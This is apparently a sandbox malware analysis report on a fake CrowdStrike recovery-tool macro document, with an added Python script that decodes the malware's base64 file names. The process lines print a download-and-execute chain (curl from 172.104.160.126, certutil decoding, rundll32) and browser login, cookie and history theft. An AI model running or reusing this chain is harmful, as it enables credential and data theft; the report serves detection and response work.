00000010.00000003.2510194846.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: document.xml Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="5A9C771D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Using recovery media on Hyper-V virtual machines</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t xml:space="preserve"> The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.</w:t></w:r></w:p><w:p w14:paraId="3F927671" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: rundll32.exe, 00000010.00000003.2238753292.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238844395.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll00
Source: document.xml Binary or memory string: s Hyper-V settings.</w:t></w:r></w:p><w:p w14:paraId="4A7B9EB4" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="14"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>Reboot normally.</w:t></w:r></w:p><w:p w14:paraId="0384424D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:lastRenderedPageBreak/><w:t>
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008B155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_008B155B
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_0087D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free, 13_2_0087D33A
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008B0CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_008B0CB4
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008B155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_008B155B
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008B16BE SetUnhandledExceptionFilter, 13_2_008B16BE
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C91410 __crtCaptureCurrentContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FFD92C91410
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C09FB0 SetUnhandledExceptionFilter, 16_2_00007FFD92C09FB0
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C09D50 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FFD92C09D50
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C08970 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FFD92C08970
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_00880CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 33_2_00880CB4
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_0088155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 33_2_0088155B
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_008816BE SetUnhandledExceptionFilter, 33_2_008816BE

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe Network Connect: 172.104.160.126 5000
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE indicator, VBA stomping: true
Source: ~WRC0000.tmp.26.dr OLE indicator, VBA stomping: true
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008B137A cpuid 13_2_008B137A
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW, 16_2_00007FFD92CD7430
Source: C:\Windows\System32\rundll32.exe Code function: __vcrt_getptd,__vcrt_getptd,GetLcidFromDefault,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 16_2_00007FFD92CD76C0
Source: C:\Windows\System32\rundll32.exe Code function: __crt_fast_encode_pointer,EnumSystemLocalesW, 16_2_00007FFD92CBDD50
Source: C:\Windows\System32\rundll32.exe Code function: __vcrt_getptd,EnumSystemLocalesW, 16_2_00007FFD92CD6AA0
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoEx,FormatMessageA, 16_2_00007FFD92C0AAC0
Source: C:\Windows\System32\rundll32.exe Code function: __vcrt_getptd,EnumSystemLocalesW, 16_2_00007FFD92CD6B70
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW, 16_2_00007FFD92CBEB80
Source: C:\Windows\System32\rundll32.exe Code function: __vcrt_getptd,EnumSystemLocalesW, 16_2_00007FFD92CD6C80
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\result.txt VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SGlzdG9yeQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\V2ViIERhdGE= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\cGxhY2VzLnNxbGl0ZQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\result.txt VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SGlzdG9yeQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\V2ViIERhdGE= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\cGxhY2VzLnNxbGl0ZQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008B1775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 13_2_008B1775
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92CC8F40 _invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,GetTimeZoneInformation, 16_2_00007FFD92CC8F40
Source: C:\Windows\SysWOW64\certutil.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Windows\System32\rundll32.exe Code function: \Google\Chrome\User Data\Default\Login Data 16_2_00007FFD92BE1290
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
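The C:\Windows\Temp file names that rundll32.exe repeatedly queries in the previous section are not random: each is the base64 encoding of a file the DLL collected. SGlzdG9yeQ== is "History", V2ViIERhdGE= is "Web Data", cGxhY2VzLnNxbGl0ZQ== is "places.sqlite", which match the Chrome and Firefox profile files the "File opened" lines above show being read; the remaining names decode to ten-letter .docx/.xlsx/.pdf names such as IPKGELNTQY.docx, i.e. user documents swept from the profile alongside the browser data, staged under a world-writable Windows directory before the connection to 172.104.160.126 on port 5000. The script below is an added triage helper, not part of this report or any sandbox tooling: it decodes such staging names strictly (rejecting anything that is not well-formed base64 or not printable text, so ordinary names like result.txt pass through untouched) and maps each decoded name to the artifact it was copied from. The path list is constructed from the report's own lines; the artifact descriptions and the document-extension set are this example's assumptions.

```python
import base64
import binascii
import re

# Constructed sample: the C:\Windows\Temp paths this report lists as queried by
# rundll32.exe. On a live host the same list would come from a directory listing
# or from file-create telemetry for C:\Windows\Temp.
STAGED_PATHS = [
    r"C:\Windows\Temp\result.txt",
    r"C:\Windows\Temp\SGlzdG9yeQ==",
    r"C:\Windows\Temp\V2ViIERhdGE=",
    r"C:\Windows\Temp\cGxhY2VzLnNxbGl0ZQ==",
    r"C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4",
    r"C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY=",
    r"C:\Windows\Temp\TVhQWENWUERWTi5kb2N4",
    r"C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4",
    r"C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4",
    r"C:\Windows\Temp\UElWRkFHRUFBVi5wZGY=",
    r"C:\Windows\Temp\UUNGV1lTS01IQS5wZGY=",
    r"C:\Windows\Temp\UU5DWUNERklKSi54bHN4",
    r"C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4",
    r"C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4",
    r"C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4",
    r"C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY=",
]

# Browser profile files this report shows rundll32.exe opening, keyed by the bare
# file name so a decoded staging name can be tied back to its source database.
# Descriptions are this example's own summary of what each file holds.
BROWSER_ARTIFACTS = {
    "History": "Chrome/Edge history (visited URLs)",
    "Web Data": "Chrome/Edge autofill and saved form data",
    "Login Data": "Chrome/Edge saved credentials",
    "Cookies": "Chrome/Edge session cookies",
    "places.sqlite": "Firefox history and bookmarks",
    "cookies.sqlite": "Firefox cookies",
}
DOC_EXT = (".docx", ".xlsx", ".pdf")   # assumption: document types seen in this run

BASE64_NAME = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def decode_staging_name(name):
    """Strict base64 decode of a file name; None unless it yields printable ASCII."""
    if not BASE64_NAME.fullmatch(name) or len(name) % 4:
        return None
    try:
        text = base64.b64decode(name, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def classify(path):
    """Describe one staged file: what its name decodes to and where it came from."""
    name = path.rsplit("\\", 1)[-1]
    decoded = decode_staging_name(name)
    if decoded is None:
        kind = "plain"                       # e.g. result.txt: not an encoded name
    elif decoded in BROWSER_ARTIFACTS:
        kind = "browser:" + BROWSER_ARTIFACTS[decoded]
    elif decoded.lower().endswith(DOC_EXT):
        kind = "document"                    # user file swept from the profile
    else:
        kind = "unknown"
    return {"path": path, "decoded": decoded, "kind": kind}


def triage(paths):
    """Classify every staged path; callers can group on 'kind' for the IR report."""
    return [classify(p) for p in paths]


if __name__ == "__main__":
    for row in triage(STAGED_PATHS):
        print(f"{row['path']:45s} -> {row['decoded']!s:20s} [{row['kind']}]")
```

Two practical notes: the decoder insists on canonical padding and printable output so that a legitimate short name that happens to be base64-shaped is not mis-reported, and the browser map is keyed by file name only, so the same "History" entry covers Chrome and Edge, which share the profile layout; the path the DLL opened tells you which one was actually read.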
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_0089A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free, 13_2_0089A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008A699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 13_2_008A699F
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_00898490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError, 13_2_00898490
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_0087DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 13_2_0087DEDF
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C496B0 _mbsset_s,_mbsset_s,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons, 16_2_00007FFD92C496B0
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C3DF49 bind,WSAGetLastError, 16_2_00007FFD92C3DF49
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C37F90 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket, 16_2_00007FFD92C37F90
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C543E0 htons,_mbsset_s,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 16_2_00007FFD92C543E0
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C3E1E0 bind,WSAGetLastError, 16_2_00007FFD92C3E1E0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_0086A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free, 33_2_0086A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_0087699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 33_2_0087699F
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_00868490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError, 33_2_00868490
